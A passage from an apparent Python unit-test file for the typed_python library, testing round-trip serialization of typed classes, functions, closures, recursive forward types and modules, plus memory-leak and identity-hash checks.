x.deserialize(x.serialize(s))
usage = currentMemUsageMb()
for _ in range(10):
x.deserialize(x.serialize(s))
print(currentMemUsageMb())
self.assertLess(currentMemUsageMb(), usage+1)
@pytest.mark.skipif('sys.platform=="darwin"')
def test_deserialize_tuple_doesnt_leak(self):
s = tuple(range(1000000))
x = SerializationContext()
x.deserialize(x.serialize(s))
usage = currentMemUsageMb()
for _ in range(10):
x.deserialize(x.serialize(s))
print(currentMemUsageMb())
self.assertLess(currentMemUsageMb(), usage+1)
@pytest.mark.skipif('sys.platform=="darwin"')
def test_deserialize_list_doesnt_leak(self):
s = list(range(1000000))
x = SerializationContext()
x.deserialize(x.serialize(s))
usage = currentMemUsageMb()
for _ in range(10):
x.deserialize(x.serialize(s))
print(currentMemUsageMb())
self.assertLess(currentMemUsageMb(), usage+1)
@pytest.mark.skipif('sys.platform=="darwin"')
def test_deserialize_class_doesnt_leak(self):
class C(Class, Final):
x = Member(int)
def f(self, x=10):
return 10
x = SerializationContext()
msg = x.serialize(C)
x.deserialize(msg)
usage = currentMemUsageMb()
for passIx in range(1000):
x.deserialize(msg)
self.assertLess(currentMemUsageMb(), usage+.5)
def test_serialize_named_tuples_with_extra_fields(self):
T1 = NamedTuple(x=int)
T2 = NamedTuple(x=int, y=float, z=str)
self.assertEqual(
deserialize(T2, serialize(T1, T1(x=10))),
T2(x=10, y=0.0, z="")
)
def test_serialize_listof(self):
T = ListOf(int)
aList = T()
aPopulatedList = T([1, 2, 3])
self.assertEqual(aList, deserialize(T, serialize(T, aList)))
self.assertEqual(refcount(deserialize(T, serialize(T, aList))), 1)
self.assertEqual(aPopulatedList, deserialize(T, serialize(T, aPopulatedList)))
self.assertEqual(refcount(deserialize(T, serialize(T, aPopulatedList))), 1)
def test_serialize_classes(self):
class AClass(Class, Final):
x = Member(int)
y = Member(float)
T = Tuple(AClass, AClass)
a = AClass(x=10, y=20.0)
a2, a2_copy = deserialize(T, serialize(T, (a, a)))
self.assertEqual(a2.x, 10)
a2.x = 300
self.assertEqual(a2_copy.x, 300)
a2_copy = None
self.assertEqual(refcount(a2), 1)
def test_embedded_messages(self):
T = NamedTuple(x=TupleOf(int))
T_with_message = NamedTuple(x=EmbeddedMessage)
T_with_two_messages = NamedTuple(x=EmbeddedMessage, y=EmbeddedMessage)
T2 = NamedTuple(x=TupleOf(int), y=TupleOf(int))
t = T(x=(1, 2, 3, 4))
tm = deserialize(T_with_message, serialize(T, t))
tm2 = T_with_two_messages(x=tm.x, y=tm.x)
t2 = deserialize(T2, serialize(T_with_two_messages, tm2))
self.assertEqual(t2.x, t.x)
self.assertEqual(t2.y, t.x)
def test_serialize_untyped_classes(self):
sc = SerializationContext()
class B:
def __init__(self, x):
self.x = x
def g(self):
return self.x
class C(B):
def f(self):
return self.x + 10
C2 = sc.deserialize(sc.serialize(C))
self.assertEqual(C2(20).f(), 30)
self.assertEqual(C2(20).g(), 20)
def test_serialize_functions_with_return_types(self):
sc = SerializationContext()
@Function
def f(x) -> int:
return x
f2 = sc.deserialize(sc.serialize(f))
self.assertEqual(f2(10.5), 10)
def test_serialize_functions_with_annotations(self):
sc = SerializationContext()
B = int
C = 10
@Function
def f(x: B = C) -> B:
return x
f2 = sc.deserialize(sc.serialize(f))
self.assertEqual(f2(10.5), 10)
with self.assertRaises(TypeError):
f2("hi")
self.assertEqual(f(), f2())
def test_serialize_typed_classes(self):
sc = SerializationContext()
class B(Class):
x = Member(int)
def f(self, y) -> int:
return self.x + y
class C(B, Final):
y = Member(int)
def g(self):
return self.x + self.y
B2 = sc.deserialize(sc.serialize(B))
self.assertEqual(
B2(x=10).f(20),
B(x=10).f(20)
)
C2 = sc.deserialize(sc.serialize(C))
self.assertEqual(
C2(x=10, y=30).f(20),
C(x=10, y=30).f(20)
)
self.assertEqual(
C2(x=10, y=30).g(),
C(x=10, y=30).g()
)
def test_serialize_recursive_typed_classes(self):
sc = SerializationContext()
B = Forward("B")
@B.define
class B(Class, Final):
x = Member(int)
def f(self, y) -> int:
return self.x + y
def getSelf(self) -> B:
return self
B2 = sc.deserialize(sc.serialize(B))
assert identityHash(B) == identityHash(B2)
instance = B2()
self.assertTrue(isinstance(instance.getSelf(), B))
self.assertTrue(isinstance(instance.getSelf(), B2))
B3 = sc.deserialize(sc.serialize(B2))
instance2 = B3()
self.assertTrue(isinstance(instance2.getSelf(), B))
self.assertTrue(isinstance(instance2.getSelf(), B2))
self.assertTrue(isinstance(instance2.getSelf(), B3))
def test_serialize_functions_with_cells(self):
def fMaker():
@Entrypoint
def g(x):
return x + 1
@Entrypoint
def f(x):
return g(x)
return f
sc = SerializationContext()
f = fMaker()
f2 = sc.deserialize(sc.serialize(f))
self.assertEqual(f2(10), 11)
def test_reserialize_functions(self):
sc = SerializationContext({'Entrypoint': Entrypoint})
with tempfile.TemporaryDirectory() as tf:
fpath = os.path.join(tf, "module.py")
with open(fpath, "w") as f:
someText = textwrap.dedent("""
from typed_python import Forward, Class, Final, Member, Entrypoint
@Entrypoint
def g(x):
return x + 1
@Entrypoint
def f(x):
return g(x)
def getH():
y = (lambda x: x + 3, lambda x: x + 4)
@Entrypoint
def h(x):
return (y[0](x), y[1](x))
return h
""")
f.write(someText)
code = compile(someText, fpath, "exec")
moduleVals = {}
exec(code, moduleVals)
f = moduleVals['f']
getH = moduleVals['getH']
f2 = sc.deserialize(sc.serialize(f))
getH2 = sc.deserialize(sc.serialize(getH))
self.assertEqual(f2(10), 11)
# clear the ast's filesystem cache.
python_ast_util.clearAllCaches()
# make sure we can still serialize 'f' itself
sc.serialize(f)
sc.serialize(getH())
# now the directory is deleted. When we reserialize it we shouldn't
# need it because it should be stashed in the ast cache.
h = getH2()
f3 = sc.deserialize(sc.serialize(f2))
h2 = sc.deserialize(sc.serialize(h))
self.assertEqual(f3(10), 11)
self.assertEqual(h2(10), (13, 14))
def test_serialize_unnamed_classes_retains_identity(self):
sc = SerializationContext()
class B:
def f(self):
return B
B2 = sc.deserialize(sc.serialize(B))
assert B2 is B
assert B2().f() is B2
assert B().f() is B2
def test_serialize_unnamed_typed_classes_retains_identity(self):
sc = SerializationContext()
class B(Class):
def f(self) -> object:
return B
B2 = sc.deserialize(sc.serialize(B))
assert B2 is B
assert B2().f() is B2
assert B().f() is B2
def test_serialize_lambda_preserves_identity_hash(self):
sc = SerializationContext()
def aFunction(self, x):
sys
return 10
aFunction2 = sc.deserialize(sc.serialize(aFunction))
assert identityHash(aFunction) == identityHash(aFunction2)
def test_serialize_subclasses(self):
sc = SerializationContext()
class B(Class):
x = Member(int)
class C1(B, Final):
f = Member(float)
class C2(B, Final):
b = Member(B)
aList = ListOf(B)()
aList.append(B(x=10))
aList.append(C1(x=20, f=30.5))
aList.append(C2(x=30, b=aList[0]))
aList2 = sc.deserialize(sc.serialize(aList))
B2 = type(aList2[0])
C12 = type(aList2[1])
C22 = type(aList2[2])
self.assertTrue(issubclass(C12, B2))
self.assertTrue(issubclass(C22, B2))
self.assertEqual(aList2[0].x, 10)
self.assertEqual(aList2[1].x, 20)
self.assertEqual(aList2[2].x, 30)
self.assertEqual(aList2[2].b.x, 10)
# verify that the reference in aList2[2].b points at aList2[0]
aList2[2].b.x = 100
self.assertEqual(aList2[0].x, 100)
def test_serialize_subclasses_multiple_views(self):
sc = SerializationContext()
class B(Class):
x = Member(int)
class C1(B):
x2 = Member(int)
class C2(C1):
x3 = Member(int)
class C3(C2):
x4 = Member(int)
c = C3()
t = Tuple(C3, C1, C2, B)((c, c, c, c))
t = sc.deserialize(sc.serialize(t))
t[0].x4 = 2
for e in t:
self.assertEqual(e.x4, 2)
def test_serialize_classes_with_staticmethods_and_properties(self):
sc = SerializationContext()
class B:
@staticmethod
def f(x):
return x + 1
@property
def p(self):
return 11
B2 = sc.deserialize(sc.serialize(B))
self.assertEqual(B2.f(10), 11)
self.assertEqual(B().p, 11)
def test_roundtrip_serialization_of_functions_with_annotations(self):
T = int
def f() -> T:
return 1
sc = SerializationContext()
f2 = sc.deserialize(sc.serialize(f))
self.assertEqual(f2(), 1)
f2Typed = Function(f2)
self.assertEqual(f2Typed.overloads[0].returnType, int)
def test_roundtrip_serialization_of_functions_with_defaults(self):
def f(x=10, *, y=20):
return x + y
sc = SerializationContext()
f2 = sc.deserialize(sc.serialize(f))
self.assertEqual(f2(), 30)
def test_roundtrip_serialization_of_functions_with_closures(self):
F = int
@Function
def f():
return float(moduleLevelIdentityFunction(F(1)))
def fWrapper():
return f()
sc = SerializationContext()
f2 = sc.deserialize(sc.serialize(f))
self.assertEqual(f2(), 1)
fWrapper2 = sc.deserialize(sc.serialize(fWrapper))
self.assertEqual(fWrapper2(), 1)
def test_serialize_many_large_equivalent_strings(self):
sc = SerializationContext()
def f(x):
return " " * x + "hi" * x
someStrings = [f(1000) for _ in range(100)]
someStrings2 = [f(1000) for _ in range(101)]
# we memoize strings, so this should be cheap
self.assertLess(
len(sc.serialize(someStrings2)) - len(sc.serialize(someStrings)),
20
)
def test_serialize_class_with_classmethod(self):
class ClassWithClassmethod(Class, Final):
@classmethod
def ownName(cls):
return str(cls)
sc = SerializationContext()
ClassWithClassmethod2 = sc.deserialize(sc.serialize(ClassWithClassmethod))
self.assertEqual(
ClassWithClassmethod2.ownName(),
ClassWithClassmethod.ownName(),
)
def test_serialize_class_with_nontrivial_signatures(self):
N = NamedTuple(x=int, y=float)
class ClassWithStaticmethod(Class, Final):
@staticmethod
def hi(x: ListOf(N)):
return len(x)
sc = SerializationContext()
ClassWithStaticmethod2 = sc.deserialize(sc.serialize(ClassWithStaticmethod))
lst = ListOf(N)()
lst.resize(2)
self.assertEqual(
ClassWithStaticmethod2.hi(lst),
ClassWithStaticmethod.hi(lst),
)
def test_serialize_class_simple(self):
sc = SerializationContext()
self.assertTrue(
sc.deserialize(sc.serialize(C)) is C
)
def test_serialize_unnamed_alternative(self):
X = Alternative("X", A={}, B={'x': int})
sc = SerializationContext()
self.assertTrue(
sc.deserialize(sc.serialize(X)).B(x=2).x == 2
)
def test_serialize_mutually_recursive_unnamed_forwards_alternatives(self):
X1 = Forward("X1")
X2 = Forward("X2")
X1 = X1.define(Alternative("X1", A={}, B={'x': X2}))
X2 = X2.define(Alternative("X2", A={}, B={'x': X1}))
sc = SerializationContext()
sc.deserialize(sc.serialize(X1))
def test_serialize_mutually_recursive_unnamed_forwards_tuples(self):
X1 = Forward("X1")
X2 = Forward("X2")
X1 = X1.define(TupleOf(OneOf(int, X2)))
X2 = X2.define(TupleOf(OneOf(float, X1)))
self.assertTrue(isRecursive(X1))
self.assertTrue(isRecursive(X2))
self.assertIs(X1.ElementType.Types[1], X2)
self.assertIs(X2.ElementType.Types[1], X1)
sc = SerializationContext().withoutCompression()
sc.deserialize(sc.serialize(X1))
def test_serialize_named_alternative(self):
self.assertEqual(
ModuleLevelAlternative.__module__,
"typed_python.types_serialization_test"
)
sc = SerializationContext()
self.assertIs(
sc.deserialize(sc.serialize(ModuleLevelAlternative)),
ModuleLevelAlternative
)
def test_serialize_unnamed_recursive_alternative(self):
X = Forward("X")
X = X.define(
Alternative("X", A={}, B={'x': int}, C={'anX': X})
)
sc = SerializationContext()
self.assertTrue(
sc.deserialize(sc.serialize(X)).B(x=2).x == 2
)
def test_serialize_module_level_class(self):
assert ModuleLevelClass.__module__ == 'typed_python.types_serialization_test'
sc = SerializationContext().withoutCompression()
self.assertIs(sc.deserialize(sc.serialize(ModuleLevelClass)), ModuleLevelClass)
self.assertIn(
b'typed_python.types_serialization_test.ModuleLevelClass',
sc.serialize(ModuleLevelClass),
)
def test_serialize_unnamed_subclass_of_named_tuple(self):
class SomeNamedTuple(NamedTuple(x=int)):
def f(self):
return self.x
sc = SerializationContext()
self.assertEqual(
sc.deserialize(sc.serialize(SomeNamedTuple))(x=10).f(),
10
)
self.assertEqual(
sc.deserialize(sc.serialize(SomeNamedTuple(x=10))).f(),
10
)
def test_serialize_named_subclass_of_named_tuple(self):
sc = SerializationContext()
self.assertEqual(
ModuleLevelNamedTupleSubclass.__module__,
"typed_python.types_serialization_test"
)
self.assertEqual(
ModuleLevelNamedTupleSubclass.__name__,
"ModuleLevelNamedTupleSubclass"
)
self.assertIs(
sc.deserialize(sc.serialize(ModuleLevelNamedTupleSubclass)),
ModuleLevelNamedTupleSubclass
)
self.assertIs(
type(sc.deserialize(sc.serialize(ModuleLevelNamedTupleSubclass()))),
ModuleLevelNamedTupleSubclass
)
self.assertIs(
type(sc.deserialize(sc.serialize([ModuleLevelNamedTupleSubclass()]))[0]),
ModuleLevelNamedTupleSubclass
)
self.assertIs(
sc.deserialize(sc.serialize(ModuleLevelNamedTupleSubclass(x=10))).f(),
10
)
def test_serialize_builtin_tp_functions(self):
sc = SerializationContext()
for thing in [
TupleOf, ListOf, OneOf, Tuple, NamedTuple, Class,
Member, ConstDict, Alternative, serialize, deserialize,
Dict, Set, SerializationContext, EmbeddedMessage,
serializeStream, deserializeStream, decodeSerializedObject,
Forward, Final, Function, Entrypoint
]:
self.assertIs(
sc.deserialize(sc.serialize(thing)), thing
)
def test_serialize_methods_on_named_classes(self):
sc = SerializationContext()
m1 = ModuleLevelNormalClass.method
m2 = sc.deserialize(sc.serialize(m1))
assert sc.nameForObject(m1) is not None
print(m1, m2)
self.assertIs(m1, m2)
def test_serialize_entrypointed_modulelevel_functions(self):
sc = SerializationContext()
self.assertIs(
type(moduleLevelEntrypointedFunction),
sc.deserialize(sc.serialize(type(moduleLevelEntrypointedFunction)))
)
self.assertIs(
type(moduleLevelEntrypointedFunction),
type(sc.deserialize(sc.serialize(moduleLevelEntrypointedFunction)))
)
def test_serialize_entrypointed_modulelevel_class_functions(self):
sc = SerializationContext()
self.assertIs(
type(ModuleLevelClass.f),
sc.deserialize(sc.serialize(type(ModuleLevelClass.f)))
)
self.assertIs(
type(ModuleLevelClass.f),
type(sc.deserialize(sc.serialize(ModuleLevelClass.f)))
)
def test_serialize_type_function(self):
sc = SerializationContext()
self.assertIs(
FancyClass(int),
sc.deserialize(sc.serialize(FancyClass(int)))
)
def test_serialize_module_level_recursive_forward(self):
sc = SerializationContext()
self.assertIs(
ModuleLevelRecursiveForward,
sc.deserialize(sc.serialize(ModuleLevelRecursiveForward))
)
def test_serialize_reference_to_module_level_constant(self):
sc = SerializationContext()
getter = sc.deserialize(sc.serialize(moduleLevelDictGetter(10)))
assert getter()[0] is moduleLevelDict
def test_serialize_type_with_reference_to_self_through_closure(self):
@Entrypoint
def f(x):
if x < 0:
return 0
return x + C.anF(x-1)
class C:
anF = f
assert f(100) == sum(range(101))
# C and 'f' are mutually recursive
sc.deserialize(sc.serialize(C))
def test_serialize_cell_type(self):
sc = SerializationContext().withoutInternalizingTypeGroups()
def f():
return sc
cellType = type(f.__closure__[0])
assert sc.deserialize(sc.serialize(cellType)) is cellType
def test_serialize_self_referencing_class(self):
sc = SerializationContext().withoutCompression().withoutInternalizingTypeGroups()
def g(x):
return 10
@TypeFunction
def C(T):
class C_(Class, Final):
@Entrypoint
def s(self):
return C_
@Entrypoint
def g(self):
return g(10)
return C_
C1 = C(int)
C2 = sc.deserialize(sc.serialize(C1))
c1 = C1()
c2 = C2()
assert c2.g() == 10
assert c2.s() is C2
# this should dispatch but we can't assume which compiled version
# of the code we'll get, so we cant check identity of C2
assert c1.g() == 10
def test_serialize_self_referencing_class_through_tuple(self):
sc = SerializationContext().withoutCompression().withoutInternalizingTypeGroups()
def g(x):
return 10
@TypeFunction
def C(T):
class C_(Class, Final):
@Function
def s(self):
return tup[0]
@Function
def g(self):
return g(10)
# this fails because when we serliaze mutually recursive python objects
# we don't understand all the kinds of objects we can walk
tup = (C_, 10)
return C_
C1 = C(int)
C2 = sc.deserialize(sc.serialize(C1))
c1 = C1()
c2 = C2()
assert c2.g() == 10
assert c2.s() is C2
assert c1.g() == 10
assert c1.s() is C1
def test_names_of_builtin_alternatives(self):
sc = SerializationContext().withoutCompression().withoutInternalizingTypeGroups()
assert sc.nameForObject(Expression) is not None
assert sc.nameForObject(Expression.Load) is not None
assert b'Store' not in sc.serialize(Expression)
assert b'Store' not in sc.serialize(Expression.Load)
sc.deserialize(sc.serialize(Expression))
sc.deserialize(sc.serialize(Expression.Load))
assert sc.deserialize(sc.serialize(native_ast.Type)) is native_ast.Type
assert sc.deserialize(sc.serialize(TupleOf(native_ast.Type))) is TupleOf(native_ast.Type)
assert sc.deserialize(sc.serialize(NamedCallTarget)) is NamedCallTarget
assert len(sc.serialize(native_ast.Type)) < 100
assert len(sc.serialize(TupleOf(native_ast.Type))) < 100
def test_badly_named_module_works(self):
sc = SerializationContext()
assert sc.objectFromName(".modules.NOT.A.REAL.MODULE") is None
def test_can_serialize_nullptrs(self):
x = PointerTo(int)()
sc = SerializationContext()
assert sc.deserialize(sc.serialize(type(x))) == type(x)
assert sc.deserialize(sc.serialize(x)) == x
def test_can_serialize_subclassOf(self):
class C(Class):
pass
class D(C):
pass
T = SubclassOf(C)
lst = ListOf(SubclassOf(C))([C, D])
sc = SerializationContext()
assert sc.deserialize(sc.serialize(T)) is T
assert sc.deserialize(sc.serialize(lst)) == lst
def test_can_serialize_nested_function_references(self):
sc = SerializationContext().withoutInternalizingTypeGroups()
def lenProxy(x):
return len(x)
otherGlobals = {'__builtins__': __builtins__}
lenProxyWithNonstandardGlobals = buildPyFunctionObject(
lenProxy.__code__,
otherGlobals,
()
)
assert lenProxy("asdf") == 4
assert lenProxyWithNonstandardGlobals("asdf") == 4
lenProxyDeserialized = sc.deserialize(sc.serialize(lenProxyWithNonstandardGlobals))
assert lenProxyDeserialized("asdf") == 4
@pytest.mark.skipif('sys.platform=="darwin"')
def test_set_closure_doesnt_leak(self):
def makeFunWithClosure(x):
def f():
return x
return f
aFun = makeFunWithClosure(10)
mem = currentMemUsageMb()
for i in range(1000000):
setFunctionClosure(aFun, makeFunWithClosure(20).__closure__)
assert currentMemUsageMb() < mem + 1
def test_serialize_without_line_info_doesnt_have_path(self):
def aFun():
return 10
sc = SerializationContext().withoutCompression().withoutLineInfoEncoded()
assert b'types_serialization_test' not in sc.serialize(aFun.__code__)
assert b'types_serialization_test' not in sc.serialize(aFun.__code__)
def test_serialize_builtin_type_objects(self):
s = SerializationContext()
def check(x):
assert s.deserialize(s.serialize(x)) is x
check(types.BuiltinFunctionType)
check(types.FunctionType)
check(types.ModuleType)
def test_serialize_self_referential_class(self):
class SeesItself:
@staticmethod
def factory(kwargs):
return lambda a, b, c: SeesItself(a, b, c)
@property
def seeItself(self, a, b, c, d):
return SeesItself
c = SerializationContext().withoutInternalizingTypeGroups()
c.deserialize(c.serialize(SeesItself))
def test_serialize_anonymous_module(self):
with tempfile.TemporaryDirectory() as tf:
c = SerializationContext().withFunctionGlobalsAsIs()
aModule = types.ModuleType("mymodule")
CONTENT = (
"y = 10\n"
"def f(x):\n"
" return x + y\n"
)
fname = os.path.join(tf, "mymodule.py")
with open(fname, "w") as f:
f.write(CONTENT)
exec(compile(CONTENT, fname, "exec"), aModule.__dict__)
assert aModule.f(10) == 20
aModule2 = c.deserialize(c.serialize(aModule))
assert aModule2.f(10) == 20
# verify the reference to the module object is correct
aModule2.y = 30
assert aModule2.f(10) == 40
def test_serialize_locks(self):
l = threading.Lock()
x = (l, l)
sc = SerializationContext()
x2 = sc.deserialize(sc.serialize(x))
assert x2[0] is x2[1] and isinstance(x2[0], type(x[0]))
def test_serialize_methods(self):
sc = SerializationContext()
assert sc.deserialize(sc.serialize(ModuleLevelClass().f))() == "HI!"
def test_can_deserialize_anonymous_class_methods(self):
class Cls:
def f(self):
return Cls
assert callFunctionInFreshProcess(Cls().f, ()) is Cls
def test_can_deserialize_untyped_forward_class_methods(self):
Cls = Forward("Cls")
@Cls.define
class Cls:
# recall that regular classes ignore their annotations
def f(self) -> Cls:
return "HI"
assert callFunctionInFreshProcess(Cls, ()).f() == "HI"
def test_can_deserialize_forward_class_methods_tp_class(self):
Cls = Forward("Cls")
@Cls.define
class Cls(Class):
m = Member(str)
def f(self) -> Cls:
return Cls(m='HI')
assert callFunctionInFreshProcess(Cls, ()).f().m == "HI"
def test_can_deserialize_forward_class_methods_tp_class_no_self_reference(self):
Cls = Forward("Cls")
@Cls.define
class Cls(Class):
m = Member(str)
def f(self) -> str:
return "HI"
assert callFunctionInFreshProcess(Cls, ()).f() == "HI"
def test_deserialize_regular_class_retains_identity(self):
class Cls:
# recall that regular classes ignore their annotations
def f(self):
Cls
return "HI"
Cls2 = type(callFunctionInFreshProcess(Cls, ()))
assert identityHash(Cls).hex() == identityHash(Cls2).hex()
@pytest.mark.skipif(
"sys.version_info.minor >= 8",
reason="serialization differences on 3.8 we need to investigate"
)
def test_identity_of_function_with_annotation_stable(self):
def makeFunction():
@Entrypoint
def f(x: float):
return x + 1
return (f, identityHash(f))
f, identityHashOfF = callFunctionInFreshProcess(makeFunction, ())
assert identityHash(f) == identityHashOfF
@pytest.mark.skipif(
"sys.version_info.minor >= 8",
reason="serialization differences on 3.8 we need to investigate"
)
def test_identity_of_function_with_default_value_stable(self):
def makeFunction():
@Entrypoint
def f(x=None):
return x + 1
return (f, identityHash(f))
f, identityHashOfF = callFunctionInFreshProcess(makeFunction, ())
assert identityHash(f) == identityHashOfF
@pytest.mark.skip(reason='broken')
def test_deserialize_untyped_class_in_forward_retains_identity(self):
# this still breaks because we have some inconsistency between how
# the MRTG gets created after deserialization when we have a regular
# python class in a forward like this.
Cls = Forward("Cls")
@Cls.define
class Cls:
def f(self) -> Cls:
return Cls()
Cls2 = type(callFunctionInFreshProcess(Cls, ()))
l = recursiveTypeGroupDeepRepr(Cls).split("\n")
r = recursiveTypeGroupDeepRepr(Cls2).split("\n")
while len(l) < len(r):
l.append("")
while len(r) < len(l):
r.append("")
def pad(x):
x = x[:120]
x = x + " " * (120 - len(x))
return x
for i in range(len(l)):
print(pad(l[i]), " " if l[i] == r[i] else " != ", pad(r[i]))
assert identityHash(Cls) == identityHash(Cls2)
def test_deserialize_tp_class_retains_identity(self):
Cls = Forward("Cls")
@Cls.define
class Cls(Class):
# recall that regular classes ignore their annotations
def f(self) -> Cls:
return Cls()
Cls2 = type(callFunctionInFreshProcess(Cls, ()))
assert identityHash(Cls) == identityHash(Cls2)
def test_call_method_dispatch_on_two_versions_of_same_class_with_recursion_defined_in_host(self):
Base = Forward("Base")
@Base.define
class Base(Class):
def blah(self) -> Base:
return self
def f(self, x) -> int:
return x + 1
class Child(Base, Final):
def f(self, x) -> int:
return -1
aChild = Child()
aChildBytes = SerializationContext().serialize(aChild)
def deserializeAndCall(someBytes):
@Entrypoint
def callF(x):
return x.f(10)
aChild = SerializationContext().deserialize(someBytes)
aChild2 = SerializationContext().deserialize(someBytes)
assert identityHash(aChild) == identityHash(aChild2)
if callF(aChild) == callF(aChild2):
return "OK"
else:
return "FAILED"
assert callFunctionInFreshProcess(deserializeAndCall, (aChildBytes,)) == "OK"
def test_call_method_dispatch_on_two_versions_of_self_referential_class_produced_differently(self):
def deserializeAndCall():
Base = Forward("Base")
@Base.define
class Base(Class):
def blah(self) -> Base:
return self
def f(self, x) -> int:
return x + 1
@Entrypoint
def callF(x: Base):
return x.f(10)
class Child(Base, Final):
def f(self, x) -> int:
return -1
return Child(), callF
child1, callF1 = callFunctionInFreshProcess(deserializeAndCall, ())
child2, callF2 = callFunctionInFreshProcess(deserializeAndCall, ())
assert identityHash(child1) == identityHash(child2)
assert identityHash(callF1) == identityHash(callF2)
assert type(child1) is type(child2)
assert type(callF1) is type(callF2)
assert callF1(child1) == callF2(child2)
def test_deserialize_anonymous_recursive_base_and_subclass(self):
def deserializeAndCall():
Base = Forward("Base")
Child = Forward("Child")
@Base.define
class Base(Class):
def blah(self) -> Child:
return Child()
def f(self, x) -> int:
return x + 1
@Child.define
class Child(Base, Final):
def f(self, x) -> int:
return -1
@Entrypoint
def callF(x: Child):
return x.f(10)
return Base, callF
Base1, callF1 = callFunctionInFreshProcess(deserializeAndCall, ())
Base2, callF2 = callFunctionInFreshProcess(deserializeAndCall, ())
assert identityHash(Base1) == identityHash(Base2)
assert identityHash(callF1) == identityHash(callF2)
assert Base1 is Base2
assert type(callF1) is type(callF2)
child1 = Base1().blah()
child2 = Base2().blah()
assert callF1(child1) == callF2(child2)
def test_identity_hash_of_lambda_doesnt_change_serialization(self):
s = SerializationContext()
f = lambda: 10
ser1 = s.serialize(f)
identityHash(f)
ser2 = s.serialize(f)
assert ser1 == ser2
def test_call_method_dispatch_on_two_versions_of_same_class_with_recursion(self):
Base = Forward("Base")
@Base.define
class Base(Class):
def blah(self) -> Base:
return self
def f(self, x) -> int:
return x + 1
@Entrypoint
def callF(x: Base):
return x.f(10)
identityHash(Base)
def deserializeAndCall():
class Child(Base, Final):
def f(self, x) -> int:
return -1
assert isinstance(Child(), Base)
return SerializationContext().serialize(Child())
childBytes = callFunctionInFreshProcess(deserializeAndCall, ())
child1 = SerializationContext().deserialize(childBytes)
child2 = SerializationContext().deserialize(childBytes)
assert type(child1) is type(child2)
childVersionOfBase = type(child1).BaseClasses[0]
assert typesAreEquivalent(Base, childVersionOfBase)
print(type(child1).BaseClasses)
assert Base in type(child1).BaseClasses
assert callF(child1) == callF(child2)
@pytest.mark.skipif(
"sys.version_info.minor >= 8",
reason="serialization differences on 3.8 we need to investigate"
)
def test_serialization_of_entrypointed_function_stable(self):
def returnSerializedForm():
s = SerializationContext().withoutCompression()
@Entrypoint
def aFun():
return 1
return s.serialize(aFun)
childBytes = callFunctionInFreshProcess(returnSerializedForm, ())
childFun = (
SerializationContext()
.withoutCompression()
.withoutInternalizingTypeGroups()
.deserialize(childBytes)
)
childBytes2 = (
SerializationContext()
.withoutCompression()
.withoutInternalizingTypeGroups()
.serialize(childFun)
)
if childBytes != childBytes2:
decoded1 = decodeSerializedObject(childBytes)
decoded2 = decodeSerializedObject(childBytes2)
decoded1Print = dict(enumerate(pprint.PrettyPrinter(indent=2).pformat(decoded1).split("\n")))
decoded2Print = dict(enumerate(pprint.PrettyPrinter(indent=2).pformat(decoded2).split("\n")))
def pad(x):
x = str(x)[:100]
x = x + " " * (100 - len(x) )
return x
for k in range(max(len(decoded1Print), len(decoded2Print))):
print(
pad(decoded1Print.get(k)),
" " if decoded1Print.get(k) == decoded2Print.get(k) else " != ",
pad(decoded2Print.get(k))
)
assert childBytes == childBytes2
def test_serialize_abc_subclass(self):
# ensure we can serialize and hash anonymous classes descended from ABC
def makeClasses():
class BaseClass(ABC):
@abstractmethod
def f(self):
pass
class ChildClass(BaseClass):
def f(self):
return "concrete"
return (BaseClass, ChildClass, ChildClass())
BaseClass, ChildClass, childInstance = callFunctionInFreshProcess(makeClasses, ())
assert type(BaseClass) is ABCMeta
assert issubclass(ChildClass, BaseClass)
assert isinstance(childInstance, ChildClass)
assert isinstance(childInstance, BaseClass)
assert childInstance.f() == "concrete"
with self.assertRaisesRegex(TypeError, "abstract methods"):
BaseClass()
class ABadChildClass(BaseClass):
pass
with self.assertRaisesRegex(TypeError, "abstract methods"):
ABadChildClass()
class AnotherChildClass(BaseClass):
def f(self):
return "concrete2"
assert AnotherChildClass().f() == "concrete2"
def test_serialize_mutually_recursive_untyped_classes(self):
# ensure we can serialize and hash anonymous classes descended from ABC
def makeClasses():
class BaseClass:
@staticmethod
def getChild():
return ChildClass()
class ChildClass(BaseClass):
pass
return (BaseClass, ChildClass, recursiveTypeGroupDeepRepr(BaseClass))
BaseClass, ChildClass, deepRepr = callFunctionInFreshProcess(makeClasses, ())
assert type(BaseClass.getChild()) is ChildClass
def test_serialize_recursive_function(self):
# ensure we can serialize and hash anonymous classes descended from ABC
def makeF():
gl = {}
gl['moduleLevelRecursiveF'] = None
f = createFunctionWithLocalsAndGlobals(
moduleLevelRecursiveF.__code__,
gl
)
gl['moduleLevelRecursiveF'] = f
return f
f = callFunctionInFreshProcess(makeF, ())
assert f(10) == 10
def test_can_serialize_classes_with_methods_and_custom_globals(self):
def f(self):
return x # noqa
f = Function(createFunctionWithLocalsAndGlobals(f.__code__, {'x': 10}))
class Base(Class):
def func(self):
pass
class Child(Base):
func = f
s = SerializationContext().withoutInternalizingTypeGroups().withFunctionGlobalsAsIs()
Child2 = s.deserialize(s.serialize(Child))
assert Child2().func() == 10
def test_can_reserialize_deserialized_function_with_no_backing_file(self):
# when we serialize an anonymous function on one machine, where we have
# a definition for that code, we need to ensure that on another machine,
# where we don't have that file, we can still get access to the original
# AST. This is because we need the AST itself, not just the code object
# and we generate the AST from the original source code.
# this test builds a function on disk and serializes it in a separate process
# we then check that the file no longer exists but that we can still
# serialize it.
def makeF():
with tempfile.TemporaryDirectory() as tempdir:
path = os.path.join(tempdir, "asdf.py")
CONTENTS = (
"def anF(x):\n"
" if x > 0:\n"
" return anF(x - 1) + 1\n"
" return 0\n"
)
with open(path, "w") as f:
f.write(CONTENTS)
globals = {'__file__': path, '__name__': 'asdf'}
exec(
compile(CONTENTS, path, "exec"),
globals
)
s = SerializationContext()
return s.serialize(globals['anF'])
serializedF = callFunctionInFreshProcess(makeF, ())
f = SerializationContext().deserialize(serializedF)
f2serialized = SerializationContext().serialize(f)
f2 = SerializationContext().deserialize(f2serialized)
assert f(10) == f2(10)
def test_globals_of_entrypointed_functions_serialized_externally(self):
def makeC():
with tempfile.TemporaryDirectory() as tempdir:
path = os.path.join(tempdir, "asdf.py")
CONTENTS = (
"from typed_python import Entrypoint, ListOf, Class, Final\n"
"class C(Class, Final):\n"
" @staticmethod\n"
" @Entrypoint\n"
" def anF():\n"
" return C\n"
)
with open(path, "w") as f:
f.write(CONTENTS)
globals = {'__file__': path}
exec(
compile(CONTENTS, path, "exec"),
globals
)
s = SerializationContext()
return s.serialize(globals['C'])
serializedC = callFunctionInFreshProcess(makeC, ())
